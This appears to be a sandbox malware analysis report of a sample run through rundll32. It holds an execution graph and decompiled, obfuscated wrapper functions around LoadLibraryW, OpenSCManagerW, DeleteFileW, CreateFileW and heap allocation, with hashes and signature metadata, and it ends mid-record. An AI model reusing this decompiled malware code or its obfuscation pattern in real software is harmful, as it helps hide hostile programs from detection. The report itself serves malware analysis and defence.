                                                                                                            execution_graph 4131 e242b2 4135 e242e8 4131->4135 4132 e33ee6 RtlAllocateHeap 4132->4135 4133 e24981 4134 e3602c CreateFileW 4134->4135 4135->4132 4135->4133 4135->4134 4125 e2d8e0 4126 e2d93b 4125->4126 4127 e3d6a7 RtlAllocateHeap 4126->4127 4130 e2db8d 4126->4130 4128 e2da2d 4127->4128 4129 e358bd DeleteFileW 4128->4129 4129->4130 3796 e3bc49 3801 e26c5e 3796->3801 3798 e3bc88 3829 e408c3 3798->3829 3800 e3bce0 3825 e26c88 3801->3825 3808 e28424 3933 e37915 3808->3933 3813 e283b4 3929 e2bb44 3813->3929 3816 e22ef6 RtlAllocateHeap 3816->3825 3820 e39d9d RtlAllocateHeap 3820->3825 3824 e28358 3824->3798 3825->3808 3825->3813 3825->3816 3825->3820 3825->3824 3832 e29587 3825->3832 3836 e3202d 3825->3836 3843 e2c26d 3825->3843 3847 e3e5d0 3825->3847 3851 e29de0 3825->3851 3856 e37eb9 3825->3856 3861 e3fc6f 3825->3861 3865 e3dc5f 3825->3865 3869 e34093 3825->3869 3873 e32fb9 3825->3873 3877 e3630a 3825->3877 3881 e24a11 3825->3881 3887 e360fa 3825->3887 3893 e36f79 3825->3893 3898 e3ffac 3825->3898 3906 e3d81a 3825->3906 3911 e40406 3825->3911 3914 e3d8fe 3825->3914 3921 e21d5c 3825->3921 4123 e252f2 3829->4123 3831 e40946 ExitProcess 3831->3800 3834 e295a5 3832->3834 3833 e29975 3833->3825 3834->3833 3939 e23fe5 3834->3939 3838 e32055 3836->3838 3839 e32086 3838->3839 3840 e3245b 3838->3840 3956 e3d6a7 3838->3956 3950 e2e51f 3839->3950 3840->3840 3846 e2c2c2 3843->3846 3844 e2c7d0 3844->3825 3845 e3d6a7 RtlAllocateHeap 3845->3846 3846->3844 3846->3845 3848 e3e60d 3847->3848 3849 e3e700 3848->3849 3850 e256ad RtlAllocateHeap LoadLibraryW 3848->3850 3849->3825 3850->3848 3854 e29e0a 3851->3854 3853 e33ee6 RtlAllocateHeap 3853->3854 3854->3853 3855 e2a113 3854->3855 3963 e37e14 3854->3963 3855->3825 3859 e37ee4 3856->3859 3857 e3d6a7 RtlAllocateHeap 3857->3859 3858 e33ee6 RtlAllocateHeap 3858->3859 3859->3857 3859->3858 3860 e37f1d 3859->3860 3860->3825 3863 e3fca1 3861->3863 3862 e37e14 OpenSCManagerW 3862->3863 3863->3862 3864 e3fcf3 3863->3864 3864->3825 3867 e3dc81 3865->3867 3866 e3e033 3866->3825 3867->3866 3966 e3602c 3867->3966 3870 e340ae 3869->3870 3871 e3447a 3870->3871 3872 e33ee6 RtlAllocateHeap 3870->3872 3871->3825 3872->3870 3874 e32ff9 3873->3874 3875 e33ee6 RtlAllocateHeap 3874->3875 3876 e331eb 3874->3876 3875->3874 3876->3825 3878 e3633c 3877->3878 3879 e3d6a7 RtlAllocateHeap 3878->3879 3880 e36b2b 3878->3880 3879->3878 3880->3825 3885 e24a42 3881->3885 3882 e3d6a7 RtlAllocateHeap 3882->3885 3883 e25287 3883->3825 3885->3882 3885->3883 3886 e37e14 OpenSCManagerW 3885->3886 3969 e30f57 3885->3969 3886->3885 3888 e3611a 3887->3888 3889 e33ee6 RtlAllocateHeap 3888->3889 3891 e36277 3888->3891 3973 e30eaf 3888->3973 3977 e237fa 3888->3977 3889->3888 3891->3825 3896 e36fa3 3893->3896 3894 e3d6a7 RtlAllocateHeap 3894->3896 3895 e3752f 3895->3825 3896->3894 3896->3895 3897 e3602c CreateFileW 3896->3897 3897->3896 3902 e3ffc4 3898->3902 3899 e40339 3899->3825 3902->3899 3905 e33ee6 RtlAllocateHeap 3902->3905 4007 e301bf 3902->4007 4014 e23023 3902->4014 4021 e38fb0 3902->4021 4027 e2ced3 3902->4027 3905->3902 3907 e3d850 3906->3907 3909 e33ee6 RtlAllocateHeap 3907->3909 3910 e3d8f4 3907->3910 4048 e332c5 3907->4048 3909->3907 3910->3825 3912 e33ee6 RtlAllocateHeap 3911->3912 3913 e40468 3912->3913 3913->3825 3917 e3d933 3914->3917 3915 e3d6a7 RtlAllocateHeap 3915->3917 3916 e3d956 4057 e3169d 3916->4057 3917->3915 3917->3916 3918 e3dc5a 3917->3918 3918->3918 3923 e21d97 3921->3923 3927 e223e9 3923->3927 4062 e28da4 3923->4062 4068 e324f9 3923->4068 4075 e3b45c 3923->4075 4081 e2e942 3923->4081 4089 e25d99 3923->4089 3927->3825 3930 e2bb65 3929->3930 3931 e3d6a7 RtlAllocateHeap 3930->3931 3932 e2c193 3930->3932 3931->3930 3932->3824 3938 e37944 3933->3938 3935 e3fc6f OpenSCManagerW 3935->3938 3936 e3d6a7 RtlAllocateHeap 3936->3938 3937 e37d44 3937->3824 3938->3935 3938->3936 3938->3937 4119 e3481a 3938->4119 3940 e23fff 3939->3940 3942 e241c7 3940->3942 3943 e33ee6 3940->3943 3942->3834 3944 e33f44 3943->3944 3947 e22cc4 3944->3947 3946 e33fc0 3946->3940 3948 e22ce0 3947->3948 3949 e22d5e RtlAllocateHeap 3948->3949 3949->3946 3951 e2e539 3950->3951 3952 e3d6a7 RtlAllocateHeap 3951->3952 3953 e2e5b9 3952->3953 3960 e358bd 3953->3960 3955 e2e707 3955->3825 3957 e3d6c2 3956->3957 3958 e33ee6 RtlAllocateHeap 3957->3958 3959 e3d79e 3958->3959 3959->3838 3959->3959 3961 e358d0 3960->3961 3962 e35949 DeleteFileW 3961->3962 3962->3955 3964 e37e31 3963->3964 3965 e37eaa OpenSCManagerW 3964->3965 3965->3854 3967 e3605c 3966->3967 3968 e360e1 CreateFileW 3967->3968 3968->3867 3970 e30f77 3969->3970 3971 e3163b 3970->3971 3972 e33ee6 RtlAllocateHeap 3970->3972 3971->3885 3972->3970 3974 e30ec5 3973->3974 3983 e2a528 3974->3983 3976 e30f50 3976->3888 3982 e2381b 3977->3982 3979 e3d6a7 RtlAllocateHeap 3979->3982 3980 e23c5e 3980->3888 3981 e33ee6 RtlAllocateHeap 3981->3982 3982->3979 3982->3980 3982->3981 4003 e22ef6 3982->4003 3986 e2a544 3983->3986 3985 e33ee6 RtlAllocateHeap 3985->3986 3986->3985 3988 e2a5a9 3986->3988 3989 e2db9b 3986->3989 3993 e2a9d2 3986->3993 3988->3976 3992 e2dbbc 3989->3992 3990 e2dbe8 3990->3986 3991 e3d6a7 RtlAllocateHeap 3991->3992 3992->3990 3992->3991 3995 e2aa0a 3993->3995 3996 e3d6a7 RtlAllocateHeap 3995->3996 3997 e2b67c 3995->3997 3998 e3a0f3 3995->3998 3996->3995 3997->3986 4002 e3a12a 3998->4002 3999 e3d6a7 RtlAllocateHeap 3999->4002 4000 e3b097 4000->3995 4001 e33ee6 RtlAllocateHeap 4001->4002 4002->3999 4002->4000 4002->4001 4004 e22f15 4003->4004 4005 e33ee6 RtlAllocateHeap 4004->4005 4006 e22fd2 4005->4006 4006->3982 4011 e30225 4007->4011 4010 e30e39 4010->3902 4011->4010 4012 e3d6a7 RtlAllocateHeap 4011->4012 4032 e3e71c 4011->4032 4036 e375ad 4011->4036 4040 e353d5 4011->4040 4012->4011 4015 e2304e 4014->4015 4016 e233f8 4015->4016 4018 e3d6a7 RtlAllocateHeap 4015->4018 4019 e233f3 4015->4019 4020 e375ad CreateFileW 4015->4020 4017 e3d6a7 RtlAllocateHeap 4016->4017 4017->4019 4018->4015 4019->3902 4020->4015 4025 e38fd7 4021->4025 4023 e396e1 4023->3902 4024 e3d6a7 RtlAllocateHeap 4024->4025 4025->4023 4025->4024 4026 e375ad CreateFileW 4025->4026 4044 e2260b 4025->4044 4026->4025 4030 e2ceff 4027->4030 4028 e2d28f 4028->3902 4029 e3d6a7 RtlAllocateHeap 4029->4030 4030->4028 4030->4029 4031 e375ad CreateFileW 4030->4031 4031->4030 4035 e3e738 4032->4035 4033 e3e8b9 4033->4011 4034 e33ee6 RtlAllocateHeap 4034->4035 4035->4033 4035->4034 4037 e375c4 4036->4037 4038 e3602c CreateFileW 4037->4038 4039 e37860 4037->4039 4038->4037 4039->4011 4043 e353ef 4040->4043 4041 e33ee6 RtlAllocateHeap 4041->4043 4042 e3543b 4042->4011 4043->4041 4043->4042 4047 e2264a 4044->4047 4045 e22b18 4045->4025 4046 e3d6a7 RtlAllocateHeap 4046->4047 4047->4045 4047->4046 4049 e332e3 4048->4049 4051 e3361d 4049->4051 4053 e3b0a4 4049->4053 4051->4051 4052 e33383 4052->3907 4054 e3b0b7 4053->4054 4055 e33ee6 RtlAllocateHeap 4054->4055 4056 e3b18c 4055->4056 4056->4052 4056->4056 4060 e316d8 4057->4060 4058 e3d6a7 RtlAllocateHeap 4058->4060 4059 e31d96 4059->3825 4060->4058 4060->4059 4061 e3169d RtlAllocateHeap 4060->4061 4061->4060 4063 e28dc1 4062->4063 4065 e29150 4063->4065 4067 e33ee6 RtlAllocateHeap 4063->4067 4094 e3c234 4063->4094 4098 e34d2b 4063->4098 4065->3923 4067->4063 4073 e32520 4068->4073 4069 e33ee6 RtlAllocateHeap 4069->4073 4070 e32c33 4070->3923 4072 e3cbe5 RtlAllocateHeap 4072->4073 4073->4069 4073->4070 4073->4072 4107 e35d5e 4073->4107 4111 e2593c 4073->4111 4080 e3b48d 4075->4080 4076 e33ee6 RtlAllocateHeap 4076->4080 4077 e3b9cc 4077->3923 4078 e353d5 RtlAllocateHeap 4078->4080 4079 e3d6a7 RtlAllocateHeap 4079->4080 4080->4076 4080->4077 4080->4078 4080->4079 4088 e2e96f 4081->4088 4082 e33ee6 RtlAllocateHeap 4082->4088 4083 e3d6a7 RtlAllocateHeap 4083->4088 4084 e2f5c8 4085 e3b0a4 RtlAllocateHeap 4084->4085 4086 e2f54b 4085->4086 4086->3923 4087 e3b0a4 RtlAllocateHeap 4087->4088 4088->4082 4088->4083 4088->4084 4088->4086 4088->4087 4093 e25dd5 4089->4093 4091 e26c54 4091->3923 4092 e3d6a7 RtlAllocateHeap 4092->4093 4093->4091 4093->4092 4115 e291d6 4093->4115 4096 e3c24e 4094->4096 4097 e3c287 4096->4097 4102 e3cbe5 4096->4102 4097->4063 4099 e34d4d 4098->4099 4100 e33ee6 RtlAllocateHeap 4099->4100 4101 e3517b 4099->4101 4100->4099 4101->4063 4106 e3cc09 4102->4106 4103 e33ee6 RtlAllocateHeap 4103->4106 4104 e3d589 4104->4096 4105 e3d6a7 RtlAllocateHeap 4105->4106 4106->4103 4106->4104 4106->4105 4109 e35d7e 4107->4109 4108 e33ee6 RtlAllocateHeap 4108->4109 4109->4108 4110 e35f93 4109->4110 4110->4073 4112 e25959 4111->4112 4113 e33ee6 RtlAllocateHeap 4112->4113 4114 e259ac 4112->4114 4113->4112 4114->4073 4118 e29218 4115->4118 4116 e33ee6 RtlAllocateHeap 4116->4118 4117 e29504 4117->4093 4118->4116 4118->4117 4121 e34846 4119->4121 4120 e3d6a7 RtlAllocateHeap 4120->4121 4121->4120 4122 e34bf1 4121->4122 4122->3938 4124 e2531f 4123->4124 4124->3831 4136 e2fbdd 4137 e2fc01 4136->4137 4138 e3b0a4 RtlAllocateHeap 4137->4138 4139 e2fc49 4137->4139 4138->4139

                                                                                                            Executed Functions

                                                                                                            Function 00E3F6A1 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42libraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 252 e3f6a1-e3f745 call e332c4 call e252f2 LoadLibraryW
                                                                                                            C-Code - Quality: 75%
                                                                                                            			E00E3F6A1(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t31;
				struct HINSTANCE__* _t37;
				WCHAR* _t40;

				_push(_a12);
				_t40 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00E332C4(_t31);
				_v28 = 0xc52aa;
				_v24 = 0x95615;
				_v20 = 0x738ab;
				_v16 = 0x613b6f;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x0c263f45;
				_v8 = 0x987e64;
				_v8 = _v8 + 0xffff93dc;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x46a8;
				_v8 = _v8 ^ 0x00098c86;
				_v12 = 0x302d8a;
				_v12 = _v12 << 0xe;
				_v12 = _v12 | 0xe7847ef7;
				_v12 = _v12 ^ 0xefed21e1;
				E00E252F2(__ecx, __edx, __ecx, 0xa2, 0xef13742b, 0x9f49d153);
				_t37 = LoadLibraryW(_t40); // executed
				return _t37;
			}












                                                                                                            0x00e3f6a8
                                                                                                            0x00e3f6ab
                                                                                                            0x00e3f6ad
                                                                                                            0x00e3f6b0
                                                                                                            0x00e3f6b3
                                                                                                            0x00e3f6b4
                                                                                                            0x00e3f6b5
                                                                                                            0x00e3f6ba
                                                                                                            0x00e3f6c4
                                                                                                            0x00e3f6cb
                                                                                                            0x00e3f6d2
                                                                                                            0x00e3f6d9
                                                                                                            0x00e3f6dd
                                                                                                            0x00e3f6e4
                                                                                                            0x00e3f6eb
                                                                                                            0x00e3f6f2
                                                                                                            0x00e3f6f6
                                                                                                            0x00e3f6fd
                                                                                                            0x00e3f704
                                                                                                            0x00e3f70b
                                                                                                            0x00e3f70f
                                                                                                            0x00e3f716
                                                                                                            0x00e3f736
                                                                                                            0x00e3f73f
                                                                                                            0x00e3f745

                                                                                                            APIs
                                                                                                            • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00E3F73F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.384668956.0000000000E20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.384706869.0000000000E42000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_e20000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID: o;a$!$CJD
                                                                                                            • API String ID: 1029625771-3784180784
                                                                                                            • Opcode ID: c45b9c2f0ee65167d17a9d1f18105e346d1cc9d46464ba724809973fdadbd5d7
                                                                                                            • Instruction ID: fce3e7aaf8b96be66a26907995cb99ea6bcee664c3084657e215ac86aa4ea1bb
                                                                                                            • Opcode Fuzzy Hash: c45b9c2f0ee65167d17a9d1f18105e346d1cc9d46464ba724809973fdadbd5d7
                                                                                                            • Instruction Fuzzy Hash: E61112B6C01308BBCB01EFA4C90A88EBFB4EB11314F508088E91576251E3B98B54DF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E37E14 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 455 e37e14-e37eb8 call e332c4 call e252f2 OpenSCManagerW
                                                                                                            C-Code - Quality: 66%
                                                                                                            			E00E37E14(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, int _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				intOrPtr _v28;
				void* _t33;
				void* _t40;

				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E00E332C4(_t33);
				_v28 = 0x38698;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0xf80068;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0x9c2a;
				_v12 = _v12 ^ 0xf804c3a3;
				_v8 = 0xd3ebc3;
				_v8 = _v8 << 0x10;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x000f62ee;
				_v16 = 0x690a65;
				_v16 = _v16 | 0xebc01c25;
				_v16 = _v16 ^ 0xebe7ec5f;
				E00E252F2(__ecx, __edx, __ecx, 0x184, 0x21b856d, 0x2217af3d);
				_t40 = OpenSCManagerW(0, 0, _a20); // executed
				return _t40;
			}











                                                                                                            0x00e37e1b
                                                                                                            0x00e37e20
                                                                                                            0x00e37e23
                                                                                                            0x00e37e24
                                                                                                            0x00e37e27
                                                                                                            0x00e37e2a
                                                                                                            0x00e37e2b
                                                                                                            0x00e37e2c
                                                                                                            0x00e37e31
                                                                                                            0x00e37e3b
                                                                                                            0x00e37e3e
                                                                                                            0x00e37e41
                                                                                                            0x00e37e48
                                                                                                            0x00e37e4c
                                                                                                            0x00e37e53
                                                                                                            0x00e37e5a
                                                                                                            0x00e37e61
                                                                                                            0x00e37e65
                                                                                                            0x00e37e7d
                                                                                                            0x00e37e80
                                                                                                            0x00e37e87
                                                                                                            0x00e37e8e
                                                                                                            0x00e37e95
                                                                                                            0x00e37ea5
                                                                                                            0x00e37eb2
                                                                                                            0x00e37eb8

                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00038698,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E37EB2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.384668956.0000000000E20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.384706869.0000000000E42000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_e20000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ManagerOpen
                                                                                                            • String ID: _
                                                                                                            • API String ID: 1889721586-4005583852
                                                                                                            • Opcode ID: 0ec8570205f070ed90a2b8cce3a636dd87b03550e57a7aa89694fbd21c5d6a25
                                                                                                            • Instruction ID: 5ddbd0eb3402d0a3ff8ce4a95d2283ed117cec6c9aab5c04cacb4bd66ece50d6
                                                                                                            • Opcode Fuzzy Hash: 0ec8570205f070ed90a2b8cce3a636dd87b03550e57a7aa89694fbd21c5d6a25
                                                                                                            • Instruction Fuzzy Hash: 7B1136B2C01218FBDF01DF98D90A8CEBFB9EF04340F108089F815A2251D3B58B20EB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E358BD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 460 e358bd-e35953 call e332c4 call e252f2 DeleteFileW
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E00E358BD(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t27;
				int _t35;
				WCHAR* _t38;

				_push(_a4);
				_t38 = __ecx;
				_push(__edx);
				_push(__ecx);
				E00E332C4(_t27);
				_v16 = 0x13586;
				_v16 = 0x4c59cc;
				_v16 = _v16 ^ 0xe50d706a;
				_v16 = _v16 ^ 0xe54f7d54;
				_v12 = 0x3bf9e4;
				_v12 = _v12 + 0x106;
				_v12 = _v12 * 0x7a;
				_v12 = _v12 ^ 0x1c92743a;
				_v8 = 0x406212;
				_v8 = _v8 * 0x60;
				_v8 = _v8 + 0xffffd8c7;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x000758b5;
				E00E252F2(__ecx, __edx, __ecx, 0x1f5, 0x7518e659, 0x9f49d153);
				_t35 = DeleteFileW(_t38); // executed
				return _t35;
			}









                                                                                                            0x00e358c4
                                                                                                            0x00e358c7
                                                                                                            0x00e358c9
                                                                                                            0x00e358ca
                                                                                                            0x00e358cb
                                                                                                            0x00e358d0
                                                                                                            0x00e358da
                                                                                                            0x00e358e1
                                                                                                            0x00e358e8
                                                                                                            0x00e358ef
                                                                                                            0x00e358f6
                                                                                                            0x00e35911
                                                                                                            0x00e35914
                                                                                                            0x00e3591b
                                                                                                            0x00e35926
                                                                                                            0x00e35929
                                                                                                            0x00e35930
                                                                                                            0x00e35934
                                                                                                            0x00e35944
                                                                                                            0x00e3594d
                                                                                                            0x00e35953

                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00E3594D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.384668956.0000000000E20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.384706869.0000000000E42000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_e20000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteFile
                                                                                                            • String ID: T}O
                                                                                                            • API String ID: 4033686569-2430299532
                                                                                                            • Opcode ID: 33b0968ab82e3241579f04d806c8c0f2fcaa2d11a57cace8da408b8f4b91dd4b
                                                                                                            • Instruction ID: cefc99f974ba43b41bc6462f1703775d919415f3170dcb32759ac76e649ff2b3
                                                                                                            • Opcode Fuzzy Hash: 33b0968ab82e3241579f04d806c8c0f2fcaa2d11a57cace8da408b8f4b91dd4b
                                                                                                            • Instruction Fuzzy Hash: 360102B5D01608FBCB04DFA8D9469DEBFB4EB00318F20C199E514B7250E7B85B948F95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E3602C Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 465 e3602c-e360f9 call e332c4 call e252f2 CreateFileW
                                                                                                            C-Code - Quality: 55%
                                                                                                            			E00E3602C(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, long _a20, WCHAR* _a24, intOrPtr _a28, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t42;
				void* _t50;
				signed int _t53;
				long _t57;
				long _t58;

				_t58 = __edx;
				_push(0);
				_push(_a36);
				_t57 = __ecx;
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00E332C4(_t42);
				_v32 = 0xf2bcc;
				_v28 = 0x9963f;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0x481e97;
				_v12 = _v12 + 0x3bb9;
				_v12 = _v12 | 0xe5ca697e;
				_v12 = _v12 ^ 0xe5cf84b6;
				_v8 = 0xca7b5c;
				_t53 = 0x38;
				_v8 = _v8 / _t53;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x0004807b;
				_v16 = 0xf3cd85;
				_v16 = _v16 ^ 0x0b7576d7;
				_v16 = _v16 ^ 0x0b87a2f8;
				E00E252F2(_t53, _v8 % _t53, _t53, 0xf4, 0xbdcc8d36, 0x9f49d153);
				_t50 = CreateFileW(_a24, _a20, _a12, 0, _t57, _t58, 0); // executed
				return _t50;
			}















                                                                                                            0x00e36037
                                                                                                            0x00e36039
                                                                                                            0x00e3603a
                                                                                                            0x00e3603d
                                                                                                            0x00e3603f
                                                                                                            0x00e36040
                                                                                                            0x00e36043
                                                                                                            0x00e36046
                                                                                                            0x00e36049
                                                                                                            0x00e3604c
                                                                                                            0x00e3604f
                                                                                                            0x00e36052
                                                                                                            0x00e36055
                                                                                                            0x00e36056
                                                                                                            0x00e36057
                                                                                                            0x00e3605c
                                                                                                            0x00e36066
                                                                                                            0x00e3606f
                                                                                                            0x00e36072
                                                                                                            0x00e36075
                                                                                                            0x00e3607c
                                                                                                            0x00e36083
                                                                                                            0x00e3608a
                                                                                                            0x00e36091
                                                                                                            0x00e3609d
                                                                                                            0x00e360a5
                                                                                                            0x00e360a8
                                                                                                            0x00e360ac
                                                                                                            0x00e360b3
                                                                                                            0x00e360ba
                                                                                                            0x00e360c1
                                                                                                            0x00e360dc
                                                                                                            0x00e360f1
                                                                                                            0x00e360f9

                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(000F2BCC,0009963F,911404DD,00000000,?,00000000,00000000), ref: 00E360F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.384668956.0000000000E20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.384706869.0000000000E42000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_e20000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 6d1239d744402909eaf6f0c2dda43dfc09e7586af067e989eca2d59162b3ddb8
                                                                                                            • Instruction ID: 008713cfc60d03666b45075fb5eda546c173dd79adea0e2f3f6533933265e6a0
                                                                                                            • Opcode Fuzzy Hash: 6d1239d744402909eaf6f0c2dda43dfc09e7586af067e989eca2d59162b3ddb8
                                                                                                            • Instruction Fuzzy Hash: DD21257290020DBFDF05DF95DC898AFBFB9EB44354F108098FA1462220D7768A64AB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E22CC4 Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 470 e22cc4-e22d6e call e332c4 call e252f2 RtlAllocateHeap
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E00E22CC4(void* __ecx, void* __edx, long _a4, intOrPtr _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t35;
				void* _t42;
				void* _t45;

				_push(_a16);
				_t45 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00E332C4(_t35);
				_v20 = 0xfe94d;
				_v16 = 0xab1c4;
				_v16 = 0x50de48;
				_v16 = _v16 * 0x6c;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0xc664fcf6;
				_v8 = 0xfaad6e;
				_v8 = _v8 << 0xf;
				_v8 = _v8 + 0xffffd3fa;
				_v8 = _v8 ^ 0xf4e1ffa5;
				_v8 = _v8 ^ 0xa25eb8a6;
				_v12 = 0xe37a21;
				_v12 = _v12 << 0xa;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0xd10447cc;
				E00E252F2(__ecx, __edx, __ecx, 0x11b, 0x94519920, 0x9f49d153);
				_t42 = RtlAllocateHeap(_t45, _a4, _a12); // executed
				return _t42;
			}










                                                                                                            0x00e22ccb
                                                                                                            0x00e22cce
                                                                                                            0x00e22cd0
                                                                                                            0x00e22cd3
                                                                                                            0x00e22cd6
                                                                                                            0x00e22cd9
                                                                                                            0x00e22cda
                                                                                                            0x00e22cdb
                                                                                                            0x00e22ce0
                                                                                                            0x00e22cea
                                                                                                            0x00e22cf1
                                                                                                            0x00e22d0c
                                                                                                            0x00e22d0f
                                                                                                            0x00e22d13
                                                                                                            0x00e22d1a
                                                                                                            0x00e22d21
                                                                                                            0x00e22d25
                                                                                                            0x00e22d2c
                                                                                                            0x00e22d33
                                                                                                            0x00e22d3a
                                                                                                            0x00e22d41
                                                                                                            0x00e22d45
                                                                                                            0x00e22d49
                                                                                                            0x00e22d59
                                                                                                            0x00e22d68
                                                                                                            0x00e22d6e

                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(?,D10447CC,000FE94D), ref: 00E22D68
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.384668956.0000000000E20000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.384706869.0000000000E42000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_e20000_rundll32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 63d04e0be5aee74c004eb1a3a006b3cda8d139836361cfad7403e2016b774436
                                                                                                            • Instruction ID: f9e882bff309044bfda1a9217f13710e158067227ba53905579a2f228fcf6857
                                                                                                            • Opcode Fuzzy Hash: 63d04e0be5aee74c004eb1a3a006b3cda8d139836361cfad7403e2016b774436
